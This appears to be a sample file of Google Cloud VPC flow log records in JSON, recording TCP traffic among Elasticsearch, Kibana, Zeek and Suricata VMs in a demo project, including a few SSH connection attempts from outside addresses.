-{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"198.51.100.88","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"203.0.113.228","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-
project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"203.0.113.134","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"7
58019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"203.0.113.134","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwo
rk_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"203.0.113.134","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"203.0.113.58","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project"
,"subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"203.0.113.134","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
